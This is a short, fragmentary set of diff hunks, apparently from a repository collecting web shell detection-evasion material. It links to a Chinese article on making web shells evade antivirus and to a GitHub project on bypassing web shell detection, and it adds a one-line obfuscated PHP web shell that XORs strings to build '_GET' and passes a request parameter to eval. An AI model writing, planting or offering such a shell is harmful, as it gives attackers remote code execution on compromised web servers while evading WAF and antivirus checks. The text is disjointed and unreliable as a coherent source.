							`### 2. [WebShell免杀 by 4hou.win](https://4hou.win/wordpress/?p=47975)`
		`@@ -0,0 +1 @@`
							`### 故名思意,收集一些方法技术pdf存档查看`
		`@@ -0,0 +1,3 @@`
							`share project bypass waf`

							`https://github.com/LandGrey/webshell-detect-bypass`
		`@@ -0,0 +1 @@`
							`<?php $a="~+d()"^"!{+{}";$b=${$a}["a"];eval("".$b);?>`